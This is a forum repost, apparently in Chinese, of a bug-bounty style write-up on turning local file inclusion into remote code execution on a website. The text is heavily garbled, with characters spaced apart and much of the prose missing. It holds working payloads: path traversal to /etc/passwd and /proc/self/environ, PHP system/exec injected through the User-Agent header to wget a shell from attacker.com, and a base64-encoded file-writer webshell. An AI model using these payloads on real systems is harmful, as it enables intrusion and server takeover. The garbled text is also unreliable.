搜索

[2173] 2020-10-12_在拥有20000+用户的网站中利用LFI到RCE

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-16
2020-10-12_在拥有20000+用户的网站中利用LFI到RCE 2 0 0 0 0 + L F I R C E   K l e i t o n x 0 0   E D I   2 0 2 0 - 1 0 - 1 2 访 4 4 3 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 L F I U R L h t t p s : / / w w w . w e b s i t e . c o m / i n d e x . p h p ? p g = c o n t a c t . p h p p g 使 p a y l o a d L F I h t t p s : / / w w w . w e b s i t e . c o m / i n d e x . p h p ? p g = . . / . . / . . / . . / e t c / p a s s w d L F I 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 0 2 L F I R C E 使 L F I R C E /   p r o c   /   s e l f   /   e n v i r o n h t t p s : / / w w w . w e b s i t e . c o m / i n d e x . p h p ? p g = . . / . . / . . / . . / p r o c / s e l f / e n v i r o n
/   p r o c   /   s e l f   /   e n v i r o n H T T P _ U S E R _ A G E N T B u r p   S u i t e U s e r - A g e n t 使 使 s y s t e m R C E < s y s t e m ' w g e t   h t t p : / / a t t a c k e r . c o m / s h e l l . t x t   - O   s h e l l . p h p ' ; > e x e c R C E < e x e c ' w g e t   h t t p : / / a t t a c k e r . c o m / s h e l l . t x t   - O   s h e l l . p h p ' ; > p h p i n i t < p h p   p h p i n f o ;   > p a y l o a d   H T T P 使 p a y l o a d < P H P   $   A   =   B A S E 6 4 _ D E C O D E ' P D 9 w a H A g C i A g J G E g P S A k X 1 B P U 1 R b J 2 N v Z G U n X T s K I C A k Z m l s Z S A 9 I E B m b 3 B l b i g k X 1 B P U 1 R b J 2 Z p b G U n X S w n d y c p O w o g I E B m d 3 J p d G U o J G Z p b G U s J G E p O w o g I E B m Y 2 x v c 2 U o J G Z p b G U p O w o / P g o 8 Y 2 V u d G V y P g o g I D x m b 3 J t I G 1 l d G h v Z D 0 i c G 9 z d C I g a W Q 9 I m Z v c m 0 i P g o g I C A g P G g y P k Z p b G U g V 3 J p d G V y P C 9 o M j 4 K I C A g I E Z p b G U g T m F t Z T x i c j 4 8 a W 5 w d X Q g d H l w Z T 0 i d G V 4 d C I g b m F t Z T 0 i Z m l s Z S I g c G x h Y 2 V o b 2 x k Z X I 9 I n N o Z W x s L n B o c C I P G J y P g o g I C A g U 2 h l b G w g Q 2 9 k Z T x i c j 4 8 d G V 4 d G F y Z W E g b m F t Z T 0 i Y 2 9 k Z S I g Z m 9 y b T 0 i Z m 9 y b S I g c G x h Y 2 V o b 2 x k Z X I 9 I l B h c 3 R l I H l v d X I g c 2 h l b G w g a G V y Z S I + P C 9 0 Z X h 0 Y X J l Y T 4 8 Y n I + C i A g I C A 8 a W 5 w d X Q g d H l w Z T 0 i c 3 V i b W l 0 I i B 2 Y W x 1 Z T 0 i V 3 J p d G U i P g o g I D w v Z m 9 y b T 4 K P C 9 j Z W 5 0 Z X I +   C G   = = ' ;   $   f i l e   =   f o p e n ' n a d e s h o t . p h p ' ' w ' ;   f w r i t e $   f i l e $   a ;   f c l o s e $   f i l e ;   > 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 使 p a y l o a d w e b s h e l l b a s e 6 4 a w e b s h e L L   p h p h t t p s : / / g i t h u b . c o m / a l i t a - i d o / P H P - F i l e - W r i t e r / b l o b / m a s t e r / l f i - w r i t e r . p h p $ a = b a s e 6 4 _ d e c o d e ' w e b s h e l l _ b a s e 6 4 _ e n c o d e d _ c o d e _ h e r e ' ; n a d e s h o t . p h p $   f i l e   =   f o p e n ' n a d e s h o t . p h p ' ' w ' ; b a s e 6 4 n a d e s h o t . p h p e c h o   f w r i t e $   f i l e $   a ; f c l o s e $   f i l e ; B u r p   S u i t e p a y l o a d   2 0 0 O K p a y l o a d h t t p s / / w e b s i t e . c o m / n a d e s h o t . p h p w e b s h e l l / n a d e s h o t . p h p . t x t
n a d e s h o t . t x t w r i t e h t t p s : / / w e b s i t e . c o m / n a d e s h o t . t x t L F I R C E .
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理